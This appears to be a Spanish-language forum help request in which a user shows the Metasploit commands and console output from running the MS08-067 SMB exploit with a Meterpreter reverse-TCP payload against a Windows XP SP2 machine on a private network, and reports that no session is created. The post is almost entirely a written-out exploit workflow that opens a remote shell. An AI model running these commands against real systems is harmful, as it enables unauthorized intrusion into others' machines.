(Nota: el autopwn y el fasttrack tampoco me funcionan me sale lo de "waiting on # modules to finish execution")
Los comandos que utilizo son los siguientes:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit (ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options ------> configuro RHOST en el exploit y LHOST en el payload
msf exploit(ms08_067_netapi) > exploit
- Started reverse handler on 192.168.1.2:4444
- Automatically detecting the target...
- Fingerprint: Windows XP Service Pack 2 - lang:Spanish
- Selected Target: Windows XP SP2 Spanish (NX)
- Triggering the vulnerability...
- Exploit completed, but no session was created.